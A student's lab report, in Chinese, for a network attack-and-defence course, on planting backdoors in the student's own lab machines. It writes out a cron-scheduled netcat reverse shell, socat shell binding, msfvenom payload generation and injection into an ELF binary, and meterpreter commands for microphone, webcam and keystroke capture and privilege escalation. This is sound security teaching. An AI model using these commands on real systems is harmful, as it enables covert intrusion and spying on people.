• 20192417张家华 202120222 《网络与系统攻防技术》实验二实验报告


    1.实验内容

    1.实践目标

    (1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)

    PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程

    (2)使用socat获取主机操作Shell, 任务计划启动

    (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    (5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

    2.实验要求

    • 掌握后门原理及免杀技术

    • 回答问题

      (1)例举你能想到的一个后门进入到你系统中的可能方式?

      :下载软件时,软件被开发者有意或无意留下了后门,则主机被引入了后门

      (2)例举你知道的后门如何启动起来(win及linux)的方式?

      :windows中:后门程序作为.exe文件或者快捷方式,被用户点击后启动,或者安装为服务后,进行自启动; Linux中:后门程序被设置在cron等服务中实现自启动

      (3)Meterpreter有哪些给你映像深刻的功能?

      :可以开启摄像头、录音、截屏、记录键盘输入字符

      (4)如何发现自己有系统有没有被安装后门?

      :杀毒软件扫描;任务管理器查看占用内存和cpu资源的程序。

    2.实验过程

    任务一:使用netcat获取主机操作Shell,cron启动某项任务

    Windows主机ip地址为192.168.3.18,Kali虚拟机ip地址为192.168.50.129


    在kali虚拟机执行指令crotab -e,在文件的末尾添加* * * * * /bin/netcat 192.168.56.1 8888 -e /bin/sh

    输入ncat.exe -l -p 8888监听8888端口

    任务二:使用socat获取主机操作Shell, 任务计划启动

    把cmd.exe绑定到端口5055,在虚拟机中输入指令socat - tcp:192.168.3.18:5055,获取主机操作shell

    任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    在kali中输入指令得到后门文件20192417.exe,windows执行ncat.exe -l 7777 > 20192417.exe指令接收后门程序,kali虚拟机中执行nc 192.168.3.18 7777 < 20192417.exe发送后门程,在windows主机可以发现后门程序

    在kali虚拟机输入msfconsole指令进入msf控制台,设置ip地址与端口号等,最后输入exploit开始监听,运行windows后门程序,在kali上获取主机shell

    任务四 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    在任务三基础上,执行以下指令

    record_mic:获取音频
    webcam_snap:控制主机摄像头拍照
    screenshot:控制主机截屏
    keyscan_start:记录主机键盘输入的过程
    keyscan_dump:读取键盘输入的记录(有序)

    getsystem指令尝试提权操作,提权失败

    任务五 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

    kali虚拟机上执行 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.50.129 LPORT=3333 -x /root/pwn20192412 -f elf >20192417pwn

    在msf控制台执行exploit进行监听,开启另外一个终端输入./20192417pwn指令,可以发现在msf控制台上成功获取了linux的shell

    3.问题及解决方案

    • 问题1:发送后门程序后发现虽然windows有这个程序但是文件大小为0kB
    • 问题1解决方案:防火墙没关,阻止了后门程序的发送
    • 问题2:任务五监听没有反应
    • 问题2解决方案:发现自己无意间生成了两个20192417pwn文件,而运行了另外一个20192417pwn文件,与监听的那个路径不一样所以监听无反应

    4.学习感悟、思考等

    在本次实验中我初步了解了后门程序的简单使用,对msf控制台一些功能的了解。在网络世界中后门程序可以起到非常大的作用,而msf控制台利用后门程序可以神不知鬼不觉地获取你的摄像头、麦克风等权限进行个人信息的盗取。这次实验给我带来了后门与安全的最直接感受,而防火墙等杀毒软件的效果是显而易见的。

  • 相关阅读:
    lsblk命令详解
    lspci命令详解
    numastat命令详解
    lsscsi命令详解
    lscpu命令详解
    linux内核模块相关命令:lsmod,depmod,modprobe,modinfo,insmod,rmmod 使用说明
    elk收集tomcat的日志
    npm安装
    centos7.5 解决缺少libstdc++.so.6库的原因及解决办法
    linux下正确卸载rpm包
  • 原文地址:https://www.cnblogs.com/zjh6/p/16096866.html
Copyright © 2020-2023  润新知